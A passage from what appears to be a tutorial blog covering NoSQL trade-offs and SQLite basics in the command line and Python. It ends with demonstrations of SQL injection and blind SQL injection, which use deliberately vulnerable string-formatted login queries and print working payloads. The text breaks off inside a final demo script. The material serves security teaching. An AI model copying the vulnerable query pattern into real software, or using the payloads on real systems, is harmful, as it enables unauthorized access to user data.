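As a rough illustration of what a flexible schema means for application code, the sketch below loads the two documents above with the standard json module and reads a field that only one of them has. The variable names and the fallback text are assumptions made for the example.

```python
import json

# The two documents from the example above, as a JSON string
raw = """
[
  {"id": 1, "user": "john", "hash": "e66860546f18"},
  {"id": 2, "user": "jane", "hash": "cdbbcd86b35e", "car": "ford"}
]
"""

documents = json.loads(raw)

for doc in documents:
    # .get() returns a default when a document has no 'car' key
    car = doc.get("car", "no car recorded")
    print(doc["user"], sorted(doc.keys()), car)
```

Because no schema guarantees that a key exists, code that reads documents typically has to handle missing fields explicitly.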
Non-Relational Databases Pros and Cons
- Pros of Non-Relational Databases (NoSQL)
  - Flexible Schema
    
    No fixed tables or columns; can store structured, semi-structured, and unstructured data.
    
    Easy to adapt to changing application requirements without redesigning the database.
  - High Scalability
    
    Designed for horizontal scaling across multiple servers, ideal for handling large datasets.
  - Performance
    
    Optimized for high-throughput reads/writes, making them suitable for real-time applications.
  - Diverse Data Models
    
    Support for documents (MongoDB), key-value pairs (Redis), wide-columns (Cassandra), and graphs (Neo4j) allows flexibility for different use cases.
  - Rapid Development
    
    Lack of strict schema enforcement allows faster development cycles.
  - Big Data and Analytics
    
    Well-suited for large-scale, dynamic datasets and big data applications.
- Cons of Non-Relational Databases
  - Lack of Standardization
    
    No universal query language like SQL; each database has its own API or query syntax.
  - Data Consistency Challenges
    
    Many NoSQL systems prioritize availability and partition tolerance over strict consistency (CAP theorem).
  - Complex Relationships
    
    Difficult to enforce relationships between datasets compared to relational databases.
  - Limited Transaction Support
    
    ACID transactions may be limited or unavailable in some NoSQL databases.
  - Tooling and Expertise
    
    Smaller ecosystem compared to mature RDBMS systems; may require specialized knowledge.
  - Data Duplication
    
    Denormalization is common, which can increase storage requirements and complicate updates.
April 5, 2026
SQLite
SQLite3

SQLite is a lightweight, disk-based database library written in C. You can use the sqlite3 binary directly from the command-line interface after installing it, or the built-in sqlite3 Python module.

Command-Line Interface
```
sqlite>
```
Python
```
import sqlite3
```
Create a Database

The .connect() function connects to a local database file, or creates a new one if the file does not exist (the .open command does the same in the command-line interface)

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    pass # 'pass' is just a placeholder; replace with actual DB operations
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn: 
    pass
```
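A small sketch of the create-if-missing behavior, assuming a throwaway temporary directory so nothing is left on disk. The names folder, path, existed_before, and existed_after are made up for the example.

```python
import os
import tempfile
from contextlib import closing
from sqlite3 import connect

with tempfile.TemporaryDirectory() as folder:
    path = os.path.join(folder, "database.db")
    existed_before = os.path.exists(path)  # the file is not there yet
    with closing(connect(path, isolation_level=None)) as conn:
        # Writing something ensures the database file is on disk
        conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    existed_after = os.path.exists(path)   # the file now exists

print(existed_before, existed_after)
```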
Drop a Table

To drop a table, use the DROP TABLE keyword followed by the table name

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS test; # Delete the table named ‘test’ if it exists
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS test;
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
```
Create a Table

To create a table, use the CREATE TABLE keyword followed by the table name. You also need to define the table columns and their types or properties

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS users; # Delete the table named 'users' if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named ‘users’ if it doesn’t already exist, column ‘id’: stores a numeric identifier for each user, column ‘user’: stores the username as text, column ‘hash’: stores the password hash as text
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
```
List All Tables

To list all tables in a database, query the sqlite_master system table using the SELECT keyword

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS users; # Delete the table named 'users' if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
sqlite> SELECT name FROM sqlite_master WHERE type='table'; # Query the SQLite system table 'sqlite_master' to list all tables in the database
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> SELECT name FROM sqlite_master WHERE type='table';
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
    print(conn.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall()) # Query the SQLite system table 'sqlite_master' to list all tables in the database
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    print(conn.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall())
```
Insert Into a Table

To add new data, use the INSERT keyword (in code, always use parameterized queries; building the statement from user input opens the door to SQL injection)

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS users; # Delete the table named 'users' if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18'); # Insert a new row into the 'users' table
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e'); # Insert a new row into the 'users' table
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18');
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e');
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (1, "john", "e66860546f18")) # Insert a new row into the 'users' table
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (2, "jane", "cdbbcd86b35e")) # Insert a new row into the 'users' table
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
```
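When several rows need to be inserted, the same parameterized statement can be reused with .executemany(). The sketch below assumes an in-memory database (":memory:") instead of database.db so that it leaves no file behind; the rows list and the inserted variable are illustrative names.

```python
from contextlib import closing
from sqlite3 import connect

# Rows to insert; each tuple fills the three ? placeholders in order
rows = [
    (1, "john", "e66860546f18"),
    (2, "jane", "cdbbcd86b35e"),
]

# ":memory:" is an assumption for this sketch; use a file path for a persistent database
with closing(connect(":memory:", isolation_level=None)) as conn:
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    # One parameterized statement executed once per row
    conn.executemany("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", rows)
    inserted = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]

print(inserted)
```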
Fetching Results

To retrieve all results from a query, use the SELECT keyword with .fetchall(); to retrieve a single result, use the SELECT keyword with .fetchone()

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS users; # Delete the table named 'users' if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18'); # Insert a new row into the 'users' table
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e'); # Insert a new row into the 'users' table
sqlite> SELECT * FROM users; # Select all columns and all rows from the ‘users’ table
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18');
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e');
sqlite> SELECT * FROM users;
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (1, "john", "e66860546f18")) # Insert a new row into the 'users' table
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (2, "jane", "cdbbcd86b35e")) # Insert a new row into the 'users' table
    print(conn.execute("SELECT * FROM users").fetchall()) # Select all columns and all rows from the 'users' table
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users").fetchall())
```
Output
```
[(1, 'john', 'e66860546f18'), (2, 'jane', 'cdbbcd86b35e')]
```
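The example above only uses .fetchall(). As a rough sketch of how .fetchone() differs, the snippet below reads one row at a time from the same cursor; it assumes an in-memory database, and the variable names are illustrative.

```python
from contextlib import closing
from sqlite3 import connect

# ":memory:" is an assumption for this sketch; the table mirrors the example above
with closing(connect(":memory:", isolation_level=None)) as conn:
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", (1, "john", "e66860546f18"))
    conn.execute("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", (2, "jane", "cdbbcd86b35e"))

    cursor = conn.execute("SELECT * FROM users ORDER BY id")
    first_row = cursor.fetchone()       # a single tuple: the next row in the result
    remaining_rows = cursor.fetchall()  # a list with whatever rows are left
    exhausted = cursor.fetchone()       # None once the result set is used up

print(first_row)
print(remaining_rows)
print(exhausted)
```

.fetchone() returns a single tuple (or None), while .fetchall() always returns a list, which may be empty.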
Find Data

You can fetch specific rows using the WHERE keyword

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS users; # Delete the table named 'users' if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18'); # Insert a new row into the 'users' table
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e'); # Insert a new row into the 'users' table
sqlite> SELECT * FROM users WHERE id=2; # Select all columns from the ‘users’ table where the user’s id is 2
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18');
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e');
sqlite> SELECT * FROM users WHERE id=2;
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (1, "john", "e66860546f18")) # Insert a new row into the 'users' table
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (2, "jane", "cdbbcd86b35e")) # Insert a new row into the 'users' table
    print(conn.execute("SELECT * FROM users WHERE id=2").fetchall()) # Select all columns from the 'users' table where the id is 2
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users WHERE id=2").fetchall())
```
Output
```
[(2, 'jane', 'cdbbcd86b35e')]
```
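When the id comes from a variable rather than being hard-coded, the value can be passed as a parameter. The sketch below assumes an in-memory database, and find_user_by_id is a hypothetical helper written for this example.

```python
from contextlib import closing
from sqlite3 import connect

def find_user_by_id(conn, user_id):
    """Hypothetical helper: return the matching row as a tuple, or None."""
    # The ? placeholder keeps user_id out of the SQL text itself
    return conn.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchone()

# ":memory:" is an assumption for this sketch
with closing(connect(":memory:", isolation_level=None)) as conn:
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", (1, "john", "e66860546f18"))
    conn.execute("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", (2, "jane", "cdbbcd86b35e"))

    found = find_user_by_id(conn, 2)
    missing = find_user_by_id(conn, 99)

print(found)
print(missing)
```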
Delete Data

You can delete data by using the DELETE keyword

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS users; # Delete the table named 'users' if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18'); # Insert a new row into the 'users' table
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e'); # Insert a new row into the 'users' table
sqlite> DELETE from users WHERE id=1; # Delete rows from the ‘users’ table where the id equals 1
sqlite> SELECT * FROM users; # Select all columns and all rows from the ‘users’ table
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18');
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e');
sqlite> DELETE from users WHERE id=1;
sqlite> SELECT * FROM users;
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed

with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (1, "john", "e66860546f18")) # Insert a new row into the 'users' table
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (2, "jane", "cdbbcd86b35e")) # Insert a new row into the 'users' table
    conn.execute("DELETE from users WHERE id=1") # Delete rows from the 'users' table where the id equals 1
    print(conn.execute("SELECT * FROM users").fetchall()) # Select all columns and all rows from the 'users' table
```
from sqlite3 import connect
from contextlib import closing

with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    conn.execute("DELETE from users WHERE id=1")
    print(conn.execute("SELECT * FROM users").fetchall())
```
Output
```
[(2, 'jane', 'cdbbcd86b35e')]
```
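A short sketch of the same delete with the id passed as a parameter, plus a check of how many rows were affected via the cursor's rowcount attribute. It assumes an in-memory database; the variable names are illustrative.

```python
from contextlib import closing
from sqlite3 import connect

# ":memory:" is an assumption for this sketch
with closing(connect(":memory:", isolation_level=None)) as conn:
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", (1, "john", "e66860546f18"))
    conn.execute("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", (2, "jane", "cdbbcd86b35e"))

    # Parameterized DELETE; rowcount reports how many rows were removed
    cursor = conn.execute("DELETE FROM users WHERE id = ?", (1,))
    deleted = cursor.rowcount
    remaining = conn.execute("SELECT * FROM users").fetchall()

print(deleted)
print(remaining)
```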
User Input (SQL Injection)

A threat actor can construct a malicious query and use it to perform an unauthorized action (this happens when the query is built with string formatting or string concatenation)

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS users; # Delete the table named 'users' if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18'); # Insert a new row into the 'users' table
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e'); # Insert a new row into the 'users' table
sqlite> SELECT * FROM users WHERE user='' or ''='' AND hash='' or ''=''; # Select all columns from the 'users' table; the WHERE clause is crafted to always be TRUE
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18');
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e');
sqlite> SELECT * FROM users WHERE user='' or ''='' AND hash='' or ''='';
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed
temp_user = input("Enter username: ") # Prompt the user to enter a username
temp_hash = input("Enter password: ") # Prompt the user to enter a password (normally the password would be hashed first; that step is omitted here)
with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (1, "john", "e66860546f18")) # Insert a new row into the 'users' table
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (2, "jane", "cdbbcd86b35e")) # Insert a new row into the 'users' table
    print(conn.execute("SELECT * FROM users WHERE user='%s' AND hash='%s'" % (temp_user, temp_hash)).fetchall()) # Execute a SQL query using string formatting to insert user-controlled values (vulnerable)
```
from sqlite3 import connect
from contextlib import closing
temp_user = input("Enter username: ")
temp_hash = input("Enter password: ")
with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    print(conn.execute("SELECT * FROM users WHERE user='%s' AND hash='%s'" % (temp_user,temp_hash)).fetchall())
```
Malicious statement

If a user enters ' or ''=' for both the username and the password, the query becomes:
```
SELECT * FROM users WHERE user='' or ''='' AND hash='' or ''=''
```
This WHERE clause is always true. Because AND binds more tightly than OR, it is evaluated as follows:
```
user='' OR (''='' AND hash='') OR ''=''
FALSE OR (TRUE AND FALSE) OR TRUE → TRUE
```
Output

The result is every row in the users table is returned, regardless of username or hash.
```
[(1, 'john', 'e66860546f18'), (2, 'jane', 'cdbbcd86b35e')]
```
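A minimal sketch contrasting the vulnerable string-formatted query with a parameterized one, using the same payload. It assumes an in-memory database; vulnerable_rows and safe_rows are names made up for the comparison.

```python
from contextlib import closing
from sqlite3 import connect

payload = "' or ''='"  # entered for both the username and the password

# ":memory:" is an assumption for this sketch
with closing(connect(":memory:", isolation_level=None)) as conn:
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", (1, "john", "e66860546f18"))
    conn.execute("INSERT INTO users(id, user, hash) VALUES (?, ?, ?)", (2, "jane", "cdbbcd86b35e"))

    # Vulnerable: the payload becomes part of the SQL text and rewrites the WHERE clause
    vulnerable_rows = conn.execute(
        "SELECT * FROM users WHERE user='%s' AND hash='%s'" % (payload, payload)
    ).fetchall()

    # Parameterized: the payload is bound as plain data and compared literally
    safe_rows = conn.execute(
        "SELECT * FROM users WHERE user = ? AND hash = ?", (payload, payload)
    ).fetchall()

print(len(vulnerable_rows))
print(safe_rows)
```

With placeholders, the quotes in the payload never reach the SQL parser, so no user matches and the result is an empty list.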
User Input (Blind SQL Injection)

A threat actor can construct a malicious query and use it to perform an unauthorized action without seeing query results or error messages, relying only on true/false behavior (this happens when the query is built with string formatting or string concatenation)

Command-Line Interface

sqlite> .open database.db # Open (or create if it doesn’t exist) a SQLite database file named ‘database.db’
sqlite> DROP TABLE IF EXISTS users; # Delete the table named 'users' if it exists
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text); # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18'); # Insert a new row into the 'users' table
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e'); # Insert a new row into the 'users' table
sqlite> SELECT * FROM users WHERE user='' OR (SELECT COUNT(*) FROM users) > 0 -- AND hash='test'; # Determine if the table 'users' exists using only true/false behavior (e.g., login success vs failure)
sqlite> .quit # Exit the SQLite command-line interface
```
sqlite> .open database.db
sqlite> DROP TABLE IF EXISTS users;
sqlite> CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text);
sqlite> INSERT into users(id, user, hash) values(1, 'john', 'e66860546f18');
sqlite> INSERT into users(id, user, hash) values(2, 'jane', 'cdbbcd86b35e');
sqlite> SELECT * FROM users WHERE user='' OR (SELECT COUNT(*) FROM users) > 0 -- AND hash='test';
sqlite> .quit
```
Python

from sqlite3 import connect # Import the connect function from sqlite3 to interact with SQLite databases
from contextlib import closing # Import closing from contextlib to ensure the connection is properly closed
temp_user = input("Enter username: ") # Prompt the user to enter a username
temp_hash = input("Enter password: ") # Prompt the user to enter a password (normally the password would be hashed first; that step is omitted here)
with closing(connect("database.db", isolation_level=None)) as conn: # Use a context manager to automatically close the database connection when done
    conn.execute("DROP TABLE IF EXISTS users") # Delete the table named 'users' if it exists
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)") # Create a table named 'users' if it doesn't already exist ('id': numeric identifier, 'user': username as text, 'hash': password hash as text)
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (1, "john", "e66860546f18")) # Insert a new row into the 'users' table
    conn.execute("INSERT into users(id, user, hash) values(?, ?, ?)", (2, "jane", "cdbbcd86b35e")) # Insert a new row into the 'users' table
    result = conn.execute("SELECT * FROM users WHERE user='%s' AND hash='%s'" % (temp_user, temp_hash)).fetchone() # Execute a SQL query using string formatting to insert user-controlled values (vulnerable); only the first row is fetched
    if result: # If a row is returned
        print("Login successful") # Show the successful message
    else: # If there is no row
        print("Login failed") # Show the failed message
```
from sqlite3 import connect
from contextlib import closing
temp_user = input("Enter username: ")
temp_hash = input("Enter password: ")
with closing(connect("database.db",isolation_level=None)) as conn:
    conn.execute("DROP TABLE IF EXISTS users")
    conn.execute("CREATE TABLE IF NOT EXISTS users (id integer, user text, hash text)")
    conn.execute("INSERT into users(id ,user, hash) values(?,?, ?)", (1,"john", "e66860546f18"))
    conn.execute("INSERT into users(id, user, hash) values(?,?, ?)", (2,"jane", "cdbbcd86b35e"))
    result = conn.execute("SELECT * FROM users WHERE user='%s' AND hash='%s'" % (temp_user,temp_hash)).fetchone()
    if result:
        print("Login successful")
    else:
        print("Login failed")
```
Malicious statement

If a user enters ' OR (SELECT COUNT(*) FROM users) > 0 -- for the username and any password, the subquery counts how many rows exist in the users table. If at least one row exists, the expression evaluates to TRUE.
```
SELECT * FROM users WHERE user='' OR (SELECT COUNT(*) FROM users) > 0 --' AND hash='test'
```
Output

It will show login successful which indicates the users table does exist.
```
Login successful
```
If a user enters ' OR (SELECT COUNT(*) FROM userx) > 0 -- for the username and any password, the subquery references a table named userx. That table does not exist, so the database rejects the statement instead of returning a row.
```
SELECT * FROM users WHERE user='' OR (SELECT COUNT(*) FROM userx) > 0 --' AND hash='test'
```
Output

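The login does not succeed, which indicates that the userx table does not exist. The output below assumes the application catches the database error and reports a failed login; the script above does not catch it, so sqlite3 raises an OperationalError (no such table: userx) instead.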
```
Login failed
```
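The two probes above can be reproduced in a small, self-contained sketch. It is an illustration under assumptions, not the original script: it uses an in-memory database, the helper names make_db and vulnerable_login are hypothetical, and it assumes the application catches sqlite3.OperationalError and treats it as a failed login.

```python
import sqlite3

def make_db():
    # In-memory database with the same 'users' table as the example above
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id integer, user text, hash text)")
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (1, "john", "e66860546f18"))
    return conn

def vulnerable_login(conn, user, pw_hash):
    # Vulnerable on purpose: input is formatted straight into the SQL string
    query = "SELECT * FROM users WHERE user='%s' AND hash='%s'" % (user, pw_hash)
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.OperationalError:
        # Assumption: the application hides database errors behind "Login failed"
        return False

conn = make_db()
for table in ("users", "userx"):
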